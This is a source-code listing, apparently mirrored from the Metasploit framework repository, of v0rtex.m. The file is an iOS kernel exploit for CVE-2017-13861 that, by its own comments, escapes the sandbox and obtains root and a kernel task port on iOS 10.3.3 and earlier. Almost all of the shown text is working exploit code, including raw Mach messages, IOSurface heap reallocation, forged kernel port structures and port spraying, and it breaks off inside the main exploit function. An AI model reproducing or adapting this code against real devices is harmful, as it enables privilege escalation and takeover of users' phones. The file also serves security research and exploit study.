CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/exploits/CVE-2017-13861/v0rtex.m
Views: 11779
1
// v0rtex
2
// Bug by Ian Beer.
3
// Exploit by Siguza.
4
5
// Status quo:
6
// - Escapes sandbox, gets root and tfp0, should work on A7-A10 devices <=10.3.3.
7
// - Can call arbitrary kernel functions with up to 7 args via KCALL().
8
// - Relies on mach_zone_force_gc() which was removed in iOS 11, but the same
9
// effect should be achievable by continuously spraying through zones and
10
// measuring how long it takes - garbage collection usually takes ages. :P
11
// - Occasionally seems to mess with SpringBoard, i.e. apps don't open when you
12
// tap on their icons - sometimes affects only v0rtex, sometimes all of them,
13
// sometimes even freezes the lock screen. Can happen even if the exploit
14
// aborts very early on, so I'm not sure whether it's even due to that, or due
15
// to my broken UI.
16
// - Most common panic at this point is "pmap_tte_deallocate(): ... refcnt=0x1",
17
// which can occur when the app is killed, but only if shmem_addr has been
18
// faulted before. Faulting that page can _sometimes_ increase the ref count
19
// on its tte entry, which causes the mentioned panic when the task is
20
// destroyed and its pmap with it. Exact source of this is unknown, but I
21
// suspect it happening in pmap_enter_options_internal(), depending on page
22
// compression status (i.e. if the page is compressed refcnt_updated is set to
23
// true and the ref count isn't increased afterwards, otherwise it is).
24
// On 32-bit such a panic can be temporarily averted with mlock(), but that
25
// seems to cause even greater trouble later with zalloc, and on 64-bit mlock
26
// even refuses to work. Deallocating shmem_addr from our address space does
27
// not fix the problem, and neither does allocating new memory at that address
28
// and faulting into it (which should _guarantee_ that the corresponding pmap
29
// entry is updated). Fixing up the ref count manually is very tedious and
30
// still seems to cause trouble with zalloc. Calling mach_zone_force_gc()
31
// after releasing the IOSurfaceRootUserClient port seems to _somewhat_ help,
32
// as does calling sched_yield() before mach_vm_remap() and faulting the page
33
// right after, so that's what I'm doing for now.
34
// In the long term, this should really be replaced by something deterministic
35
// that _always_ works (like removing the tte entirely).
36
37
// Not sure what'll really become of this, but it's certainly not done yet.
38
// Pretty sure I'll leave iOS 11 to Ian Beer though, for the time being.
39
40
#include <errno.h> // errno
41
#include <sched.h> // sched_yield
42
#include <stdlib.h> // malloc, free
43
#include <string.h> // strerror
44
#include <unistd.h> // usleep, setuid, getuid
45
#include <mach/mach.h>
46
#include <mach-o/loader.h>
47
#include <CoreFoundation/CoreFoundation.h>
48
49
#include "common.h" // LOG, kptr_t
50
#include "v0rtex.h"
51
52
#if 0
53
#define LOG(msg, ...) \
54
do { \
55
char* buffer = malloc(1024); \
56
sprintf(buffer, msg, __VA_ARGS__); \
57
fopen(buffer, "w"); \
58
free(buffer); \
59
} while (0)
60
#else
61
#define LOG(str, args...) do {} while(0)
62
#endif
63
64
// ********** ********** ********** get rid of ********** ********** **********
65
66
#ifdef __LP64__
67
# define OFFSET_TASK_ITK_SELF 0xd8
68
# define OFFSET_IOUSERCLIENT_IPC 0x9c
69
#else
70
# define OFFSET_TASK_ITK_SELF 0x9c
71
# define OFFSET_IOUSERCLIENT_IPC 0x5c
72
#endif
73
74
#define IOSURFACE_CREATE_OUTSIZE 0x3c8 /* XXX 0x6c8 for iOS 11.0, 0xbc8 for 11.1.2 */
75
76
// ********** ********** ********** constants ********** ********** **********
77
78
#ifdef __LP64__
79
# define KERNEL_MAGIC MH_MAGIC_64
80
# define KERNEL_HEADER_OFFSET 0x4000
81
#else
82
# define KERNEL_MAGIC MH_MAGIC
83
# define KERNEL_HEADER_OFFSET 0x1000
84
#endif
85
86
#define KERNEL_SLIDE_STEP 0x100000
87
88
#define NUM_BEFORE 0x2000
89
#define NUM_AFTER 0x1000
90
#define FILL_MEMSIZE 0x4000000
91
#if 0
92
#define NUM_DATA 0x4000
93
#define DATA_SIZE 0x1000
94
#endif
95
#ifdef __LP64__
96
# define VTAB_SIZE 200
97
#else
98
# define VTAB_SIZE 250
99
#endif
100
101
const uint64_t IOSURFACE_CREATE_SURFACE = 0;
102
const uint64_t IOSURFACE_SET_VALUE = 9;
103
const uint64_t IOSURFACE_GET_VALUE = 10;
104
const uint64_t IOSURFACE_DELETE_VALUE = 11;
105
106
const uint32_t IKOT_TASK = 2;
107
108
enum
109
{
110
kOSSerializeDictionary = 0x01000000U,
111
kOSSerializeArray = 0x02000000U,
112
kOSSerializeSet = 0x03000000U,
113
kOSSerializeNumber = 0x04000000U,
114
kOSSerializeSymbol = 0x08000000U,
115
kOSSerializeString = 0x09000000U,
116
kOSSerializeData = 0x0a000000U,
117
kOSSerializeBoolean = 0x0b000000U,
118
kOSSerializeObject = 0x0c000000U,
119
120
kOSSerializeTypeMask = 0x7F000000U,
121
kOSSerializeDataMask = 0x00FFFFFFU,
122
123
kOSSerializeEndCollection = 0x80000000U,
124
125
kOSSerializeMagic = 0x000000d3U,
126
};
127
128
// ********** ********** ********** macros ********** ********** **********
129
130
#define UINT64_ALIGN_DOWN(addr) ((addr) & ~7)
131
#define UINT64_ALIGN_UP(addr) UINT64_ALIGN_DOWN((addr) + 7)
132
133
#if 0
134
#define UNALIGNED_COPY(src, dst, size) \
135
do \
136
{ \
137
for(volatile uint32_t *_src = (volatile uint32_t*)(src), \
138
*_dst = (volatile uint32_t*)(dst), \
139
*_end = (volatile uint32_t*)((uintptr_t)(_src) + (size)); \
140
_src < _end; \
141
*(_dst++) = *(_src++) \
142
); \
143
} while(0)
144
#endif
145
146
#ifdef __LP64__
147
# define UNALIGNED_KPTR_DEREF(addr) (((kptr_t)*(volatile uint32_t*)(addr)) | (((kptr_t)*((volatile uint32_t*)(addr) + 1)) << 32))
148
#else
149
# define UNALIGNED_KPTR_DEREF(addr) ((kptr_t)*(volatile uint32_t*)(addr))
150
#endif
151
152
#define VOLATILE_BCOPY32(src, dst, size) \
153
do \
154
{ \
155
for(volatile uint32_t *_src = (volatile uint32_t*)(src), \
156
*_dst = (volatile uint32_t*)(dst), \
157
*_end = (volatile uint32_t*)((uintptr_t)(_src) + (size)); \
158
_src < _end; \
159
*(_dst++) = *(_src++) \
160
); \
161
} while(0)
162
163
#define VOLATILE_BZERO32(addr, size) \
164
do \
165
{ \
166
for(volatile uint32_t *_ptr = (volatile uint32_t*)(addr), \
167
*_end = (volatile uint32_t*)((uintptr_t)(_ptr) + (size)); \
168
_ptr < _end; \
169
*(_ptr++) = 0 \
170
); \
171
} while(0)
172
173
#define RELEASE_PORT(port) \
174
do \
175
{ \
176
if(MACH_PORT_VALID((port))) \
177
{ \
178
_kernelrpc_mach_port_destroy_trap(self, (port)); \
179
port = MACH_PORT_NULL; \
180
} \
181
} while(0)
182
183
// ********** ********** ********** IOKit ********** ********** **********
184
185
typedef mach_port_t io_service_t;
186
typedef mach_port_t io_connect_t;
187
extern const mach_port_t kIOMasterPortDefault;
188
CFMutableDictionaryRef IOServiceMatching(const char *name) CF_RETURNS_RETAINED;
189
io_service_t IOServiceGetMatchingService(mach_port_t masterPort, CFDictionaryRef matching CF_RELEASES_ARGUMENT);
190
kern_return_t IOServiceOpen(io_service_t service, task_port_t owningTask, uint32_t type, io_connect_t *client);
191
kern_return_t IOServiceClose(io_connect_t client);
192
kern_return_t IOConnectCallStructMethod(mach_port_t connection, uint32_t selector, const void *inputStruct, size_t inputStructCnt, void *outputStruct, size_t *outputStructCnt);
193
kern_return_t IOConnectCallAsyncStructMethod(mach_port_t connection, uint32_t selector, mach_port_t wake_port, uint64_t *reference, uint32_t referenceCnt, const void *inputStruct, size_t inputStructCnt, void *outputStruct, size_t *outputStructCnt);
194
kern_return_t IOConnectTrap6(io_connect_t connect, uint32_t index, uintptr_t p1, uintptr_t p2, uintptr_t p3, uintptr_t p4, uintptr_t p5, uintptr_t p6);
195
196
// ********** ********** ********** other unexported symbols ********** ********** **********
197
198
kern_return_t mach_vm_remap(vm_map_t dst, mach_vm_address_t *dst_addr, mach_vm_size_t size, mach_vm_offset_t mask, int flags, vm_map_t src, mach_vm_address_t src_addr, boolean_t copy, vm_prot_t *cur_prot, vm_prot_t *max_prot, vm_inherit_t inherit);
199
200
// ********** ********** ********** helpers ********** ********** **********
201
202
static const char *errstr(int r)
203
{
204
return r == 0 ? "success" : strerror(r);
205
}
206
207
static uint32_t transpose(uint32_t val)
208
{
209
uint32_t ret = 0;
210
for(size_t i = 0; val > 0; i += 8)
211
{
212
ret += (val % 255) << i;
213
val /= 255;
214
}
215
return ret + 0x01010101;
216
}
217
218
// ********** ********** ********** MIG ********** ********** **********
219
220
static kern_return_t my_mach_zone_force_gc(host_t host)
221
{
222
#pragma pack(4)
223
typedef struct {
224
mach_msg_header_t Head;
225
} Request;
226
typedef struct {
227
mach_msg_header_t Head;
228
NDR_record_t NDR;
229
kern_return_t RetCode;
230
mach_msg_trailer_t trailer;
231
} Reply;
232
#pragma pack()
233
234
union {
235
Request In;
236
Reply Out;
237
} Mess;
238
239
Request *InP = &Mess.In;
240
Reply *OutP = &Mess.Out;
241
242
InP->Head.msgh_bits = MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
243
InP->Head.msgh_remote_port = host;
244
InP->Head.msgh_local_port = mig_get_reply_port();
245
InP->Head.msgh_id = 221;
246
InP->Head.msgh_reserved = 0;
247
248
kern_return_t ret = mach_msg(&InP->Head, MACH_SEND_MSG|MACH_RCV_MSG|MACH_MSG_OPTION_NONE, (mach_msg_size_t)sizeof(Request), (mach_msg_size_t)sizeof(Reply), InP->Head.msgh_local_port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
249
if(ret == KERN_SUCCESS)
250
{
251
ret = OutP->RetCode;
252
}
253
return ret;
254
}
255
256
static kern_return_t my_mach_port_get_context(task_t task, mach_port_name_t name, mach_vm_address_t *context)
257
{
258
#pragma pack(4)
259
typedef struct {
260
mach_msg_header_t Head;
261
NDR_record_t NDR;
262
mach_port_name_t name;
263
} Request;
264
typedef struct {
265
mach_msg_header_t Head;
266
NDR_record_t NDR;
267
kern_return_t RetCode;
268
mach_vm_address_t context;
269
mach_msg_trailer_t trailer;
270
} Reply;
271
#pragma pack()
272
273
union {
274
Request In;
275
Reply Out;
276
} Mess;
277
278
Request *InP = &Mess.In;
279
Reply *OutP = &Mess.Out;
280
281
InP->NDR = NDR_record;
282
InP->name = name;
283
InP->Head.msgh_bits = MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
284
InP->Head.msgh_remote_port = task;
285
InP->Head.msgh_local_port = mig_get_reply_port();
286
InP->Head.msgh_id = 3228;
287
InP->Head.msgh_reserved = 0;
288
289
kern_return_t ret = mach_msg(&InP->Head, MACH_SEND_MSG|MACH_RCV_MSG|MACH_MSG_OPTION_NONE, (mach_msg_size_t)sizeof(Request), (mach_msg_size_t)sizeof(Reply), InP->Head.msgh_local_port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
290
if(ret == KERN_SUCCESS)
291
{
292
ret = OutP->RetCode;
293
}
294
if(ret == KERN_SUCCESS)
295
{
296
*context = OutP->context;
297
}
298
return ret;
299
}
300
301
kern_return_t my_mach_port_set_context(task_t task, mach_port_name_t name, mach_vm_address_t context)
302
{
303
#pragma pack(4)
304
typedef struct {
305
mach_msg_header_t Head;
306
NDR_record_t NDR;
307
mach_port_name_t name;
308
mach_vm_address_t context;
309
} Request;
310
typedef struct {
311
mach_msg_header_t Head;
312
NDR_record_t NDR;
313
kern_return_t RetCode;
314
mach_msg_trailer_t trailer;
315
} Reply;
316
#pragma pack()
317
318
union {
319
Request In;
320
Reply Out;
321
} Mess;
322
323
Request *InP = &Mess.In;
324
Reply *OutP = &Mess.Out;
325
326
InP->NDR = NDR_record;
327
InP->name = name;
328
InP->context = context;
329
InP->Head.msgh_bits = MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
330
InP->Head.msgh_remote_port = task;
331
InP->Head.msgh_local_port = mig_get_reply_port();
332
InP->Head.msgh_id = 3229;
333
InP->Head.msgh_reserved = 0;
334
335
kern_return_t ret = mach_msg(&InP->Head, MACH_SEND_MSG|MACH_RCV_MSG|MACH_MSG_OPTION_NONE, (mach_msg_size_t)sizeof(Request), (mach_msg_size_t)sizeof(Reply), InP->Head.msgh_local_port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
336
if(ret == KERN_SUCCESS)
337
{
338
ret = OutP->RetCode;
339
}
340
return ret;
341
}
342
343
// Raw MIG function for a merged IOSurface deleteValue + setValue call, attempting to increase performance.
344
// Prepare everything - sched_yield() - fire.
345
static kern_return_t reallocate_buf(io_connect_t client, uint32_t surfaceId, uint32_t propertyId, void *buf, mach_vm_size_t len)
346
{
347
#pragma pack(4)
348
typedef struct {
349
mach_msg_header_t Head;
350
NDR_record_t NDR;
351
uint32_t selector;
352
mach_msg_type_number_t scalar_inputCnt;
353
mach_msg_type_number_t inband_inputCnt;
354
uint32_t inband_input[4];
355
mach_vm_address_t ool_input;
356
mach_vm_size_t ool_input_size;
357
mach_msg_type_number_t inband_outputCnt;
358
mach_msg_type_number_t scalar_outputCnt;
359
mach_vm_address_t ool_output;
360
mach_vm_size_t ool_output_size;
361
} DeleteRequest;
362
typedef struct {
363
mach_msg_header_t Head;
364
NDR_record_t NDR;
365
uint32_t selector;
366
mach_msg_type_number_t scalar_inputCnt;
367
mach_msg_type_number_t inband_inputCnt;
368
mach_vm_address_t ool_input;
369
mach_vm_size_t ool_input_size;
370
mach_msg_type_number_t inband_outputCnt;
371
mach_msg_type_number_t scalar_outputCnt;
372
mach_vm_address_t ool_output;
373
mach_vm_size_t ool_output_size;
374
} SetRequest;
375
typedef struct {
376
mach_msg_header_t Head;
377
NDR_record_t NDR;
378
kern_return_t RetCode;
379
mach_msg_type_number_t inband_outputCnt;
380
char inband_output[4096];
381
mach_msg_type_number_t scalar_outputCnt;
382
uint64_t scalar_output[16];
383
mach_vm_size_t ool_output_size;
384
mach_msg_trailer_t trailer;
385
} Reply;
386
#pragma pack()
387
388
// Delete
389
union {
390
DeleteRequest In;
391
Reply Out;
392
} DMess;
393
394
DeleteRequest *DInP = &DMess.In;
395
Reply *DOutP = &DMess.Out;
396
397
DInP->NDR = NDR_record;
398
DInP->selector = IOSURFACE_DELETE_VALUE;
399
DInP->scalar_inputCnt = 0;
400
401
DInP->inband_input[0] = surfaceId;
402
DInP->inband_input[2] = transpose(propertyId);
403
DInP->inband_input[3] = 0x0; // Null terminator
404
DInP->inband_inputCnt = sizeof(DInP->inband_input);
405
406
DInP->ool_input = 0;
407
DInP->ool_input_size = 0;
408
409
DInP->inband_outputCnt = sizeof(uint32_t);
410
DInP->scalar_outputCnt = 0;
411
DInP->ool_output = 0;
412
DInP->ool_output_size = 0;
413
414
DInP->Head.msgh_bits = MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
415
DInP->Head.msgh_remote_port = client;
416
DInP->Head.msgh_local_port = mig_get_reply_port();
417
DInP->Head.msgh_id = 2865;
418
DInP->Head.msgh_reserved = 0;
419
420
// Set
421
union {
422
SetRequest In;
423
Reply Out;
424
} SMess;
425
426
SetRequest *SInP = &SMess.In;
427
Reply *SOutP = &SMess.Out;
428
429
SInP->NDR = NDR_record;
430
SInP->selector = IOSURFACE_SET_VALUE;
431
SInP->scalar_inputCnt = 0;
432
433
SInP->inband_inputCnt = 0;
434
435
SInP->ool_input = (mach_vm_address_t)buf;
436
SInP->ool_input_size = len;
437
438
SInP->inband_outputCnt = sizeof(uint32_t);
439
SInP->scalar_outputCnt = 0;
440
SInP->ool_output = 0;
441
SInP->ool_output_size = 0;
442
443
SInP->Head.msgh_bits = MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
444
SInP->Head.msgh_remote_port = client;
445
SInP->Head.msgh_local_port = mig_get_reply_port();
446
SInP->Head.msgh_id = 2865;
447
SInP->Head.msgh_reserved = 0;
448
449
// Deep breath
450
sched_yield();
451
452
// Fire
453
kern_return_t ret = mach_msg(&DInP->Head, MACH_SEND_MSG|MACH_RCV_MSG|MACH_MSG_OPTION_NONE, sizeof(DeleteRequest), (mach_msg_size_t)sizeof(Reply), DInP->Head.msgh_local_port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
454
if(ret == KERN_SUCCESS)
455
{
456
ret = DOutP->RetCode;
457
}
458
if(ret != KERN_SUCCESS)
459
{
460
return ret;
461
}
462
ret = mach_msg(&SInP->Head, MACH_SEND_MSG|MACH_RCV_MSG|MACH_MSG_OPTION_NONE, sizeof(SetRequest), (mach_msg_size_t)sizeof(Reply), SInP->Head.msgh_local_port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
463
if(ret == KERN_SUCCESS)
464
{
465
ret = SOutP->RetCode;
466
}
467
return ret;
468
}
469
470
// ********** ********** ********** data structures ********** ********** **********
471
472
#ifdef __LP64__
473
typedef volatile struct
474
{
475
kptr_t prev;
476
kptr_t next;
477
kptr_t start;
478
kptr_t end;
479
} kmap_hdr_t;
480
#endif
481
482
typedef volatile struct {
483
uint32_t ip_bits;
484
uint32_t ip_references;
485
struct {
486
kptr_t data;
487
uint32_t type;
488
#ifdef __LP64__
489
uint32_t pad;
490
#endif
491
} ip_lock; // spinlock
492
struct {
493
struct {
494
struct {
495
uint32_t flags;
496
uint32_t waitq_interlock;
497
uint64_t waitq_set_id;
498
uint64_t waitq_prepost_id;
499
struct {
500
kptr_t next;
501
kptr_t prev;
502
} waitq_queue;
503
} waitq;
504
kptr_t messages;
505
uint32_t seqno;
506
uint32_t receiver_name;
507
uint16_t msgcount;
508
uint16_t qlimit;
509
#ifdef __LP64__
510
uint32_t pad;
511
#endif
512
} port;
513
kptr_t klist;
514
} ip_messages;
515
kptr_t ip_receiver;
516
kptr_t ip_kobject;
517
kptr_t ip_nsrequest;
518
kptr_t ip_pdrequest;
519
kptr_t ip_requests;
520
kptr_t ip_premsg;
521
uint64_t ip_context;
522
uint32_t ip_flags;
523
uint32_t ip_mscount;
524
uint32_t ip_srights;
525
uint32_t ip_sorights;
526
} kport_t;
527
528
typedef volatile struct {
529
union {
530
kptr_t port;
531
uint32_t index;
532
} notify;
533
union {
534
uint32_t name;
535
kptr_t size;
536
} name;
537
} kport_request_t;
538
539
typedef volatile union
540
{
541
struct {
542
struct {
543
kptr_t data;
544
uint32_t reserved : 24,
545
type : 8;
546
#ifdef __LP64__
547
uint32_t pad;
548
#endif
549
} lock; // mutex lock
550
uint32_t ref_count;
551
uint32_t active;
552
uint32_t halting;
553
#ifdef __LP64__
554
uint32_t pad;
555
#endif
556
kptr_t map;
557
} a;
558
struct {
559
char pad[OFFSET_TASK_ITK_SELF];
560
kptr_t itk_self;
561
} b;
562
} ktask_t;
563
564
// ********** ********** ********** more helper functions because it turns out we need access to data structures... sigh ********** ********** **********
565
566
static kern_return_t reallocate_fakeport(io_connect_t client, uint32_t surfaceId, uint32_t pageId, uint64_t off, mach_vm_size_t pagesize, kport_t *kport, uint32_t *buf, mach_vm_size_t len)
567
{
568
bool twice = false;
569
if(off + sizeof(kport_t) > pagesize)
570
{
571
twice = true;
572
VOLATILE_BCOPY32(kport, (void*)((uintptr_t)&buf[9] + off), pagesize - off);
573
VOLATILE_BCOPY32((void*)((uintptr_t)kport + (pagesize - off)), &buf[9], sizeof(kport_t) - off);
574
}
575
else
576
{
577
VOLATILE_BCOPY32(kport, (void*)((uintptr_t)&buf[9] + off), sizeof(kport_t));
578
}
579
buf[6] = transpose(pageId);
580
kern_return_t ret = reallocate_buf(client, surfaceId, pageId, buf, len);
581
if(twice && ret == KERN_SUCCESS)
582
{
583
++pageId;
584
buf[6] = transpose(pageId);
585
ret = reallocate_buf(client, surfaceId, pageId, buf, len);
586
}
587
return ret;
588
}
589
590
kern_return_t readback_fakeport(io_connect_t client, uint32_t pageId, uint64_t off, mach_vm_size_t pagesize, uint32_t *request, size_t reqsize, uint32_t *resp, size_t respsz, kport_t *kport)
591
{
592
request[2] = transpose(pageId);
593
size_t size = respsz;
594
kern_return_t ret = IOConnectCallStructMethod(client, IOSURFACE_GET_VALUE, request, reqsize, resp, &size);
595
LOG("getValue(%u): 0x%lx bytes, %s", pageId, size, mach_error_string(ret));
596
if(ret == KERN_SUCCESS && size == respsz)
597
{
598
size_t sz = pagesize - off;
599
if(sz > sizeof(kport_t))
600
{
601
sz = sizeof(kport_t);
602
}
603
VOLATILE_BCOPY32((void*)((uintptr_t)&resp[4] + off), kport, sz);
604
if(sz < sizeof(kport_t))
605
{
606
++pageId;
607
request[2] = transpose(pageId);
608
size = respsz;
609
ret = IOConnectCallStructMethod(client, IOSURFACE_GET_VALUE, request, reqsize, resp, &size);
610
LOG("getValue(%u): 0x%lx bytes, %s", pageId, size, mach_error_string(ret));
611
if(ret == KERN_SUCCESS && size == respsz)
612
{
613
VOLATILE_BCOPY32(&resp[4], (void*)((uintptr_t)kport + sz), sizeof(kport_t) - sz);
614
}
615
}
616
}
617
if(ret == KERN_SUCCESS && size < respsz)
618
{
619
LOG("%s", "Response too short.");
620
ret = KERN_FAILURE;
621
}
622
return ret;
623
}
624
625
// ********** ********** ********** ye olde pwnage ********** ********** **********
626
627
kern_return_t v0rtex(offsets_t *off, mach_port_t* tfp0, uint64_t* kernelbase)
628
{
629
kern_return_t retval = KERN_FAILURE,
630
ret = 0;
631
task_t self = mach_task_self();
632
host_t host = mach_host_self();
633
634
io_connect_t client = MACH_PORT_NULL;
635
mach_port_t stuffport = MACH_PORT_NULL;
636
mach_port_t realport = MACH_PORT_NULL;
637
mach_port_t before[NUM_BEFORE] = { MACH_PORT_NULL };
638
mach_port_t port = MACH_PORT_NULL;
639
mach_port_t after[NUM_AFTER] = { MACH_PORT_NULL };
640
mach_port_t fakeport = MACH_PORT_NULL;
641
mach_vm_size_t pagesize = 0,
642
shmemsz = 0;
643
uint32_t *dict_prep = NULL,
644
*dict_big = NULL,
645
*dict_small = NULL,
646
*resp = NULL;
647
mach_vm_address_t shmem_addr = 0;
648
mach_port_array_t maps = NULL;
649
650
/********** ********** data hunting ********** **********/
651
652
vm_size_t pgsz = 0;
653
ret = _host_page_size(host, &pgsz);
654
pagesize = pgsz;
655
LOG("page size: 0x%llx, %s", pagesize, mach_error_string(ret));
656
if(ret != KERN_SUCCESS)
657
{
658
goto out;
659
}
660
661
io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOSurfaceRoot"));
662
LOG("service: %x", service);
663
if(!MACH_PORT_VALID(service))
664
{
665
goto out;
666
}
667
668
ret = IOServiceOpen(service, self, 0, &client);
669
LOG("client: %x, %s", client, mach_error_string(ret));
670
if(ret != KERN_SUCCESS || !MACH_PORT_VALID(client))
671
{
672
goto out;
673
}
674
675
uint32_t dict_create[] =
676
{
677
kOSSerializeMagic,
678
kOSSerializeEndCollection | kOSSerializeDictionary | 1,
679
680
kOSSerializeSymbol | 19,
681
0x75534f49, 0x63616672, 0x6c6c4165, 0x6953636f, 0x657a, // "IOSurfaceAllocSize"
682
kOSSerializeEndCollection | kOSSerializeNumber | 32,
683
0x1000,
684
0x0,
685
};
686
union
687
{
688
char _padding[IOSURFACE_CREATE_OUTSIZE];
689
struct
690
{
691
mach_vm_address_t addr1;
692
mach_vm_address_t addr2;
693
uint32_t id;
694
} data;
695
} surface;
696
VOLATILE_BZERO32(&surface, sizeof(surface));
697
size_t size = sizeof(surface);
698
ret = IOConnectCallStructMethod(client, IOSURFACE_CREATE_SURFACE, dict_create, sizeof(dict_create), &surface, &size);
699
LOG("newSurface: %s", mach_error_string(ret));
700
if(ret != KERN_SUCCESS)
701
{
702
goto out;
703
}
704
LOG("surface ID: 0x%x", surface.data.id);
705
706
/********** ********** data preparation ********** **********/
707
708
size_t num_data = FILL_MEMSIZE / pagesize,
709
dictsz_prep = (5 + 4 * num_data) * sizeof(uint32_t),
710
dictsz_big = dictsz_prep + (num_data * pagesize),
711
dictsz_small = 9 * sizeof(uint32_t) + pagesize,
712
respsz = 4 * sizeof(uint32_t) + pagesize;
713
dict_prep = malloc(dictsz_prep);
714
if(!dict_prep)
715
{
716
LOG("malloc(prep): %s", strerror(errno));
717
goto out;
718
}
719
dict_big = malloc(dictsz_big);
720
if(!dict_big)
721
{
722
LOG("malloc(big): %s", strerror(errno));
723
goto out;
724
}
725
dict_small = malloc(dictsz_small);
726
if(!dict_small)
727
{
728
LOG("malloc(small): %s", strerror(errno));
729
goto out;
730
}
731
resp = malloc(respsz);
732
if(!resp)
733
{
734
LOG("malloc(resp): %s", strerror(errno));
735
goto out;
736
}
737
VOLATILE_BZERO32(dict_prep, dictsz_prep);
738
VOLATILE_BZERO32(dict_big, dictsz_big);
739
VOLATILE_BZERO32(dict_small, dictsz_small);
740
VOLATILE_BZERO32(resp, respsz);
741
742
// ipc.ports zone uses 0x3000 allocation chunks, but hardware page size before A9
743
// is actually 0x1000, so references to our reallocated memory may be shifted
744
// by (0x1000 % sizeof(kport_t))
745
kport_t triple_kport;
746
VOLATILE_BZERO32(&triple_kport, sizeof(triple_kport));
747
triple_kport.ip_lock.data = 0x0;
748
triple_kport.ip_lock.type = 0x11;
749
#ifdef __LP64__
750
triple_kport.ip_messages.port.waitq.waitq_queue.next = 0x0;
751
triple_kport.ip_messages.port.waitq.waitq_queue.prev = 0x11;
752
triple_kport.ip_nsrequest = 0x0;
753
triple_kport.ip_pdrequest = 0x11;
754
#endif
755
756
uint32_t *prep = dict_prep;
757
uint32_t *big = dict_big;
758
*(big++) = *(prep++) = surface.data.id;
759
*(big++) = *(prep++) = 0x0;
760
*(big++) = *(prep++) = kOSSerializeMagic;
761
*(big++) = *(prep++) = kOSSerializeEndCollection | kOSSerializeArray | 1;
762
*(big++) = *(prep++) = kOSSerializeEndCollection | kOSSerializeDictionary | num_data;
763
for(size_t i = 0; i < num_data; ++i)
764
{
765
*(big++) = *(prep++) = kOSSerializeSymbol | 5;
766
*(big++) = *(prep++) = transpose(i);
767
*(big++) = *(prep++) = 0x0; // null terminator
768
*(big++) = (i + 1 >= num_data ? kOSSerializeEndCollection : 0) | kOSSerializeString | (pagesize - 1);
769
size_t j = 0;
770
for(uintptr_t ptr = (uintptr_t)big, end = ptr + pagesize; ptr < end; ptr += sizeof(triple_kport))
771
{
772
size_t sz = end - ptr;
773
if(sz > sizeof(triple_kport))
774
{
775
sz = sizeof(triple_kport);
776
}
777
triple_kport.ip_context = (0x10000000ULL | (j << 20) | i) << 32;
778
#ifdef __LP64__
779
triple_kport.ip_messages.port.pad = 0x20000000 | (j << 20) | i;
780
triple_kport.ip_lock.pad = 0x30000000 | (j << 20) | i;
781
#endif
782
VOLATILE_BCOPY32(&triple_kport, ptr, sz);
783
++j;
784
}
785
big += (pagesize / sizeof(uint32_t));
786
*(prep++) = (i + 1 >= num_data ? kOSSerializeEndCollection : 0) | kOSSerializeBoolean | 1;
787
}
788
789
dict_small[0] = surface.data.id;
790
dict_small[1] = 0x0;
791
dict_small[2] = kOSSerializeMagic;
792
dict_small[3] = kOSSerializeEndCollection | kOSSerializeArray | 1;
793
dict_small[4] = kOSSerializeEndCollection | kOSSerializeDictionary | 1;
794
dict_small[5] = kOSSerializeSymbol | 5;
795
// [6] later
796
dict_small[7] = 0x0; // null terminator
797
dict_small[8] = kOSSerializeEndCollection | kOSSerializeString | (pagesize - 1);
798
799
uint32_t dummy = 0;
800
size = sizeof(dummy);
801
ret = IOConnectCallStructMethod(client, IOSURFACE_SET_VALUE, dict_prep, dictsz_prep, &dummy, &size);
802
if(ret != KERN_SUCCESS)
803
{
804
LOG("setValue(prep): %s", mach_error_string(ret));
805
goto out;
806
}
807
808
/********** ********** black magic ********** **********/
809
810
ret = _kernelrpc_mach_port_allocate_trap(self, MACH_PORT_RIGHT_RECEIVE, &stuffport);
811
LOG("stuffport: %x, %s", stuffport, mach_error_string(ret));
812
if(ret != KERN_SUCCESS || !MACH_PORT_VALID(stuffport))
813
{
814
goto out;
815
}
816
817
ret = _kernelrpc_mach_port_insert_right_trap(self, stuffport, stuffport, MACH_MSG_TYPE_MAKE_SEND);
818
LOG("mach_port_insert_right: %s", mach_error_string(ret));
819
if(ret != KERN_SUCCESS)
820
{
821
goto out;
822
}
823
824
ret = _kernelrpc_mach_port_allocate_trap(self, MACH_PORT_RIGHT_RECEIVE, &realport);
825
LOG("realport: %x, %s", realport, mach_error_string(ret));
826
if(ret != KERN_SUCCESS || !MACH_PORT_VALID(realport))
827
{
828
goto out;
829
}
830
831
sched_yield();
832
// Clean out full pages already in freelists
833
ret = my_mach_zone_force_gc(host);
834
if(ret != KERN_SUCCESS)
835
{
836
LOG("mach_zone_force_gc: %s", mach_error_string(ret));
837
goto out;
838
}
839
840
for(size_t i = 0; i < NUM_BEFORE; ++i)
841
{
842
ret = _kernelrpc_mach_port_allocate_trap(self, MACH_PORT_RIGHT_RECEIVE, &before[i]);
843
if(ret != KERN_SUCCESS)
844
{
845
LOG("mach_port_allocate: %s", mach_error_string(ret));
846
goto out;
847
}
848
}
849
850
ret = _kernelrpc_mach_port_allocate_trap(self, MACH_PORT_RIGHT_RECEIVE, &port);
851
if(ret != KERN_SUCCESS)
852
{
853
LOG("mach_port_allocate: %s", mach_error_string(ret));
854
goto out;
855
}
856
if(!MACH_PORT_VALID(port))
857
{
858
LOG("port: %x", port);
859
goto out;
860
}
861
862
for(size_t i = 0; i < NUM_AFTER; ++i)
863
{
864
ret = _kernelrpc_mach_port_allocate_trap(self, MACH_PORT_RIGHT_RECEIVE, &after[i]);
865
if(ret != KERN_SUCCESS)
866
{
867
LOG("mach_port_allocate: %s", mach_error_string(ret));
868
goto out;
869
}
870
}
871
872
LOG("port: %x", port);
873
874
